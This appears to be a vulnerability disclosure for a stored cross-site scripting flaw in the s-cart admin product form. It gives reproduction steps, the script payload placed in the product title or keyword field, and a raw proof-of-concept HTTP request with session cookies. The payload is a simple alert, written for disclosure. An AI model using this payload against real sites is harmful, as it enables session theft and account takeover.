Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
1. `git clone https://github.com/s-cart/s-cart` and `composer install` 2. Login as admin and add product. 3. add XSS payload as Product title `"><script>alert("test")</script>` or Keyword as both are vulnerable. 4. Click on send and get the popup. ## POC request: POST /s-cart/public/sc_admin/product/create HTTP/1.1 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------391325859225283787311340371998 Content-Length: 3823 Origin: http://localhost:8000 Connection: keep-alive Referer: http://localhost:8000/s-cart/public/sc_admin/product/create Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; curSection_options=%22meta-polja%22; localhost-cms-admin-files1=%7B%220%22%3A0%7D; BLUDIT-KEY=r7oq4j0i11ldvm76u09r82mfdo; online_inovicing_system=r0e1337b4kup6v48o6t3qal0s7; cat_session_id=1sfltmkpoq80mv9hqhti0d8oug; XSRF-TOKEN=eyJpdiI6ImtXNlZMcDY4SmtOWVRGQUpqTFp1a2c9PSIsInZhbHVlIjoiTzA3cGZNemViTWcra2FPSitqaFVXeE9OWHdvZW42Wk1ML3hpbE1uRTVPcit2M2FaMzBWK3ZORkxaRStNbDFQSWdBNnlVanhFdm1kMlRzSHN3SlEydDJRMHYwcXJaV0wxTVJIUzhIcWJhcGpXVFE0c0RYWUw4cGRHQThBL1o3SW0iLCJtYWMiOiIxZmNhZjg1NjFjOTA4YmJiOWM2OTlmN2VmMDI4OTg1OTRkOWU4YzJhZDVhODk1YmQ3MGMwNTBiMjYzYWEyYmVhIn0%3D; scart_session=eyJpdiI6ImZhaXY5ZUFzenZuRTNoTUY5TmcvRFE9PSIsInZhbHVlIjoiVHB4M09id25mV0IzbFoyd1lKY3R3QWxzaHFnYlVRcldOeGpGMkRwc0YrM3Zuc1dIbDlmZWtpVElGZWc5Q21RckJuMFVMeHpQMTlNUGN0dlp0SkxNenY4OVlrbVJxSC9QS0FpTnBNMUsvTFI2L1d0UHRKSmFvdG9Gem1BNUtOYWUiLCJtYWMiOiIxYzViNmQ1MTU2OGJjNmQwNzBiMzM2YWUxY2M2NTdmZmE1ZjE0YTlkZDkzNDEwMmUyNGYzMzNlODQ4ZTYyOTM5In0%3D Upgrade-Insecure-Requests: 1
With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.